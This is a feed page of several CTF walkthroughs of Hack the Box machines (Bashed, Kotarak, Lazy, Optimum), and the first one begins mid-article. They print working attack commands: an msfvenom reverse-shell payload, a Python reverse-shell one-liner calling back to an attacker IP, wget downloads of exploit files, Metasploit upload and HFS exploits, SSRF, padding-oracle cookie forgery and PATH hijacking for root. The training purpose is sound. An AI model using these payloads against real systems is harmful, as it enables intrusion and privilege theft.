Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, therefore, they have a static IP. Bashed Lab has IP: 10.10.10.68.

Now, as always let’s begin our hacking with the port enumeration.

nmap -A 10.10.10.68

Knowing port 80 was open on victim’s network we preferred to explore his IP in the browser and the following image as shown below.

Next, we use the dirb tool of kali to enumerate the directories and found some important directories such as /dev

So when you will open /dev directory in the browser, you will get a link for phpbash.php. Click on that link.

It will redirect to the following page as shown below, which seems like a shell interacting through the browser.

After that, you can execute any os arbitrary command for testing whether it’s working or not. We have run ls command to check present list in the current directory.

Inside /html directory we found uploads folder and hence now we can easily compromise the target’s system by uploading backdoor.

Using msfvenom we had created a malicious shell.php file by executing following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.28 lport=4444 -f raw

Simultaneously run multi/handler for reverse connection of victim’s system.

We had used Python HTTP server for transferring file, you can also use an alternative method for transferring and download the malicious file from wget inside uploads directory.

Now execute the malicious file shell.php from the browser as shown below and move to metasploit framework for reverse connection.

After executing uploaded backdoor file come back to Metasploit framework and wait for meterpreter session.

msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 10.10.14.28
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit

From given below image you can observe meterpreter session1 opened for accessing victim tty shell.

Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home directory and check available files and directories inside it.

cd home
ls

Here one directories arrexel, when I explore /home/arrexel I saw user.txt and use cat command for reading.

cd arrexel
ls
cat user.txt

Great!!  Here we had completed 1st task now move to 2nd task

For spawning proper tty shell of target’s system we need to import python file, therefore, I run following command inside meterpreter shell

shell
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a

Run ls -al command to observe all directories with their permissions. Here you will notice the user scriptmanager has permission for accessing /scripts directory.

When we tried to open /scripts directory as the default user, it shows Permission Denied message. Then run sudo -l command which will tell us that the scriptmanager has No password of all things.

Then we run following command for penetrating scripts folder with help of scriptmanager

sudo -u scriptmanager ls /scripts
sudo -u scriptmanager cat /scripts/test.py
sudo -u scriptmanager cat /scripts/test.txt

Since we found a python file, therefore, our strategy will be to replace the original test.py file from malicious python file to have a reverse connection over netcat and for that, you need to save following code in a text file. 

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Save this file with .py extension and transfer it into victim’s system and start netcat on listening port.

 Note: Replace 10.10.14.28 from inside the code into your VPN IP.

Now download malicious python file inside /tmp

wget http://10.10.14.28/root.py

And then copy the root.py from inside /tmp into test.py in /script with the help of following command.

sudo -u scriptmanager cp /tmp/root.py /scripts/test.py

After some time you will get reverse connect at netcat terminal with root access. Now finished the task by capturing root.txt file as shown below.

nc -lvp 1234
id
cd /root
ls
cat root.txt

2nd Method for finding root.txt flag.

We find machine architecture 14.0 in above method. So we start looking for a related kernel exploit in Google and luckily found an exploit from here for root privilege escalation. 

Copy and paste the whole text inside a text file and save as poc.c

After that compile it with help of the following command:

gcc poc.c -o pwn

Run python HTTP server for transferring it into targets system.

At last, download complied file pwn into target machine from wget inside /dev/shm as shown in the image then give full permission and run the file.

wget http://10.10.14.28/pwn
chmod 777 pwn
./pwn

It will give you root access, now catch the root.txt flag as soon as possible because it will crash the kernel after some time.

cd /root
cat root.txt

Superb!! We had completed the task and hacked this box.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box Challenge Bashed Walkthrough appeared first on Hacking Articles.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello friends!! Today we are going to solve another CTF challenge “Kotarak” which is available online for those who want to increase their skill in penetration testing and black box testing. Kotarak is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Hard

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.55 so let’s begin with nmap port enumeration.

nmap -p- -A 10.10.10.55 –open  

From given below image, you can observe we found port 22, 8009, 8080, 60000 are open in victim’s network.

As port 8080 and 60000 are running HTTP, we open the IP in our browser and access the page through port 8080. As soon as we open the ip in our browser we get a tomcat authentication prompt asking for username and password.

When we access the target machine through port 60000, we find a page that is hosted on the machine can be used to access the internet.

Now we need to use the dirb tool to enumerate the directories of the target machine.

dirb http://10.10.10.55:60000/

From given below image you can observe the highlighted directory that is put up by dirb in its output result.

We now try to check if the page is vulnerable to SSRF or not by trying to access a forbidden page on the target machine.

when we open server-status through the vulnerable page, we are able to access the forbidden content. We then find that port 888 is listening locally on the target machine.

Then we opened http://localhost:888 through URL and it contains a few links to different files.

We open backup and find that it was empty.

To gain further information we used curl to access the page and find that it is an XML file that contains a username and password.

curl http://10.10.10.51:60000/url.php?path=localhost:888/?doc=backup

We use the above credentials to login into tomcat manager application that is hosted on port 8080.

As we were able the right credentials for tomcat server, we found that it was vulnerable to this exploit here. We used metasploit to exploit this vulnerability.

msf > use exploit/multi/http/tomcat_mgr_upload

msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.55

msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080

msf exploit(multi/http/tomcat_mgr_upload) > set httpusername admin

msf exploit(multi/http/tomcat_mgr_upload) > set httppassword 3@g01PdhB!

msf exploit(multi/http/tomcat_mgr_upload) > exploit

Finally, we got the meterpreter session as shown in the below image

After gaining the reverse shell we start enumerating the target system. In /home/tomcat/to_archive/pentest_data we find a few interesting files.

In /home/tomcat/to_archive/Pentest_data we find a directory information tree file and binary file.

We download both the files into our system

We used impacket-secretsdump to dump hashes inside the files.

We were able to crack one of the hashes and find it to be f16tomcat!

We use this to login as atanas, we then move into /root/ folder and find a file called flag.txt. When we open it we find that it was a dummy flag file.

In the root directory, we also find a log file when we take a look at the content of the file we find that it contains log that we were created using wget. We also find that the wget version used is 1.16

Searching on the Exploit-DB site we find that this version of wget was vulnerable to remote code execution.

We follow the instructions given on exploit-db.com about how to exploit this vulnerability.

Then we had opened the wgetrc file through vim for changing the path of Post_file from /etc/shadow into /root/root.txt

We download the code of this exploit from exploit-db.com and upload it to the target machine through meterpreter.

We then give read, write and execute permission to the file.

We then use authbind to run the file, as authbind allows a program to that would normally require super user privileges to access privileged network services to run as a non-privileged user.  As soon as we run the exploit we get the root flag.

Autthor: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Box Challenge Kotarak Walkthrough appeared first on Hacking Articles.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello Friends!! Today we are going to solve a CTF Challenge “Lazy”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs are designed for beginner to the Expert penetration tester. Lazy is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, therefore, they have a static IP. Lazy Lab has IP: 10.10.10.18.

Now, as always let’s begin our hacking with the port enumeration.

nmap -A 10.10.10.18

As you can see in the given screenshot that we have two services running on our Target Machine, ssh and HTTP on ports 22 and 80 respectively.

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on the IP. After opening the IP in the browser, we were greeted by a simple page with Register and Login Links. Clicking on the Register opens up a form.

Then I decided to register as admin: 123 for username and password respectively. 

But I got an alert “Duplicate entry ‘admin’ for key PRIMARY”, also received error “can’t create user: user exists” when I registered as admin. Hence username “admin” is already registered, now we though to crack the password for login but that was quite tough to crack.

At last, I decide to use burp suite for capturing browser request. Here I simply register with aadmin as username and password 123.

And got intercepted request, here I saw auth cookie. Then I send the intercept request to the repeater for analyses its response. It gave a hint “invalid padding” which means there could be padding oracle vulnerability. To know more about what is padding oracle vulnerability read our previous article from here. Since I had already faced such situation in my past experience, therefore, I know what to do next.

Next open terminal to run the command shown in the given image which contains target URL and above-copied auth cookie

Further type 2 where it asked ID recommended

Last part of screenshot has captured three decrypt values in base64, HEX and ASCII. The cookie of auth is a combination of username with its password from padbuster we come to know what is the encrypted value of username for admin.

We are very near to our goal just encrypt this auth cookie with the user as admin once again. Here we have our plaintext as admin and let’s encode it using padbuster.

Further type 2 where it asked ID recommended. Here the highlighted part is our encrypted value for admin. Copy It “BAit——–AAAA”.

Now replace the original auth cookie from the encrypted value which you have copied above and forwarded the intercepted request.

When request sent by burp suite, automatically on the web server you will get logged in as an admin account. After that when you will access the admin page you will get a URL “my key” that offers us with a username mitsos and an ssh key. 

So as you can observe that we had opened the ssh key let’s save it into a text file as “key” on the desktop and if you notice the URL can read ssh login username mitsos.

First, let’s download the key and then give appropriate permission using the chmod. Now that we have the ssh username and key let’s get an ssh session.

ssh -I key mitsos@10.10.10.18

After successfully accessing PTY shell of a victim system, a simple ‘ls’ command shown us that we have the user.txt. Congrats we got our user flag.

Now, let’s work on the root flag.

As we saw in the screenshot above that we the peda and backup folder too. We tried working around it but nothing useful seems to come up. On running the executable backup we saw that it prints the shadow file with user hashes. So we ran the strings command and found that it does contain command “cat /etc/shadow” 

Now, all we needed to do was to create a personalized executable cat file, which can be done as shown in below image. Here we are reprogramming cat to give us the shell, on execution.

Now I will have to set $PATH, firstly let’s see the $PATH using the echo command

echo $PATH

Now exporting Path

export PATH=’/home/mitsos’ :$PATH

Here what we did was add the home/mitsos in the $PATH because we have created that personalized cat file here. Now if we ran the backup executable, our cat will get executed.

But Lets First give the proper permission to the personalized cat file we created.

chmod 777 cat

Now let’s execute the backup to see if we get the shell. Great! We have the root shell.

Now all left is to get to the root directory and get the flag. But remember we have the $PATH changed so to run the cat command we will have to specify the location.

/bin/cat root.txt.

Great!! We got our root flag successfully

And this way, we successfully solved our challenge. YAY!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box Challenge Lazy Walkthrough appeared first on Hacking Articles.

Read Full Article
Visit website
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Hello friends!! Today we are going to solve another CTF challenge “Optimum” which is categories as retired lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much tough until you don’t have correct knowledge of Penetration testing. Let start and learn how to breach into a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of optimum is 10.10.10.8 so let’s start with nmap port enumeration.

nmap -A 10.10.10.8

From given below image, you can observe that we found ports 80 is open for file sharing using HFS 2.3 in victim’s network.

When I Google for searching any relative exploit I found first link for metasploit exploit.  

Then I run msfconsole command in terminal and load metasploit framework for using rejetto_hfs_exec module for exploiting target machine.

use exploit/windows/http/rejetto_hfs_exec

msf exploit(windows/http/rejetto_hfs_exec) >set payload windows/64/meterpreter/reverse_tcp

msf exploit(windows/http/rejetto_hfs_exec) >set rhost 10.10.0.8

msf exploit(windows/http/rejetto_hfs_exec) >set lhost 10.10.14.6

msf exploit(windows/http/rejetto_hfs_exec) >set svrhost 10.10.14.6

msf exploit(windows/http/rejetto_hfs_exec) >exploit

And it works perfectly, I have own meterpreter session 1 as shown below and by running sysinfo command I came to know about its system information.

Now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside its directories.

Inside c:\Document and Setting \kostas\Desktop I found user.txt file and used cat “file name” command for reading this file.

cat user.txt.txt

Great!! We got our 1st flag successfully

For getting root flag I really struggle a lot, all privilege escalation exploit suggested by recon/local_exploit_suggester are proved vanish when I try them.  Then I took help from Google for searching exploit related to windows server and found many exploits, between those “MS16-098 exploit 41020” was among them.  I simply downloaded this exe file and go with manual privilege escalation.

After downloading exe file from Google, I transferred it into target’s machine via meterperter session.

Meterpreter> upload /root/Desktop/41020.exe .

Meterpreter> shell

Then after executing whoami command it’s assured me “nt authority\system”

Inside c:\Document and Setting \Administrator\Desktop I found root.txt file and used cat “file name” command for reading this file.

type root.txt

Great!! We got our 2nd flag successfully

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Hack the Box Challenge: Optimum Walkthrough appeared first on Hacking Articles.

Read Full Article
Visit website

Read for later

Articles marked as Favorite are saved for later viewing.
close
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Separate tags by commas
To access this feature, please upgrade your account.
Start your free month
Free Preview